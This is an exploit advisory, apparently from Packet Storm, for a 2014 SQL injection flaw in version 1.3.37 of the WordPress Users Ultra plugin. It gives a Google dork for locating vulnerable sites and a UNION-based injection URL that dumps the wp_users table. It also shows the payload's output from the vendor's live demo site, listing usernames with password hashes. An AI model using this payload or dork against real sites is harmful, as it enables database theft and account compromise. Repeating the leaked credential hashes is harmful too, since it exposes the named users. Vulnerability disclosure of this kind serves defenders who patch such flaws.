WordPress Users Ultra plugin version 1.3.37 suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.
83da12e41fe8a52bf90f4d659a6a4eb3c4147e951cc5121e09d3c3df702d14ea#################################################################################################
# Title : Wordpress Users Ultra Plugin - SQL injection Vulnerability
# Risk : High+/Critical
# Author : XroGuE
# Google Dork : inurl: wp-content/plugins/users-ultra/
# Plugin Version : 1.3.37
# Plugin Name : users ultra
# Plugin Download Link : https://downloads.wordpress.org/plugin/users-ultra.zip
# Vendor Home : http://www.usersultra.com/
# Date : 2014/09/27
# Tested in : Win7 - Linux
##################################################################################################
# Description:
# This Vulnerability Available in Both Version of This Plugin (Free & Pro Version).
# You need To Login As member and Send Or Recive a Message To Get A Message ID To Inject it.
# The Vendor Demo Has This Vulnerability,Check it at This Link: http://usersultra.com/uultra-testing/
#
# PoC :
#
# http://localhost/wp/?page_id=117&module=messages&view=[id]
#
# Proof :
#
# http://www.aparat.com/v/vNI81
# http://www.myblog.att4ck3r.ir/wordpress-users-ultra-plugin-sql-injection-vulnerability/
#
##################################################################################################
#
# Demo :
#
# http://localhost/wp/?page_id=117&module=messages&view=1+and+1=0 union all select 1,2,3,group_concat(user_login,0x3a,user_pass),5,6,7,8,9,10 from+wp_users--
# => Users: admin:$P$BsrGHnd./mOlHkK15iHCn81gjJQekC.,test:$P$Bmfp8cwwTYKxKlPQZSJtjVfa4Vw11o1
#
#
# http://usersultra.com/uultra-testing/myaccount/?module=messages&view=63 and 1=0 union all select 1,2,3,group_concat(user_login,0x3a,user_pass),5,6,7,8,9,10 from+wp_users--
# => Users: admin:$P$BN.dvG/wrbH1RPFn2DHAkqr6G6NrKs1,franco_zuna:$P$Bakm4N8i/uS/VDjVfQ6oeSYRJWGZ4n.,test:$P$BRraCwdfKm2WGnnukOORsHDhfWmXVv/,adan_brock:$P$BmbyJbV5L8wf.xaRWxHyjAGMz/2UxL.,sean_daze:$P$B0mbw9c/W96/4SlTAkkLGePMqqgZKX1,allnetprovider-z:$P$BuEBNJXebTD3j5gmNqSNsZd8dwQUJb.,Ali28:$P$BeMVJLGapu6EF7FdBtPtKdxGZTKBgl1,Rolan-Deri:$P$Bf/Yt2IEEPxlURhBjPkA3UXyCLIuAX/,louis_h_central_geek:$P$BsYPVcay/T4t4HRSaG0j89mmJPMGjw1
#
##################################################################################################
#
# Discovered By : XroGuE
# Website : http://www.Att4ck3r.ir
# E-Mail : info[at]att4ck3r[Dot]ir
#
##################################################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed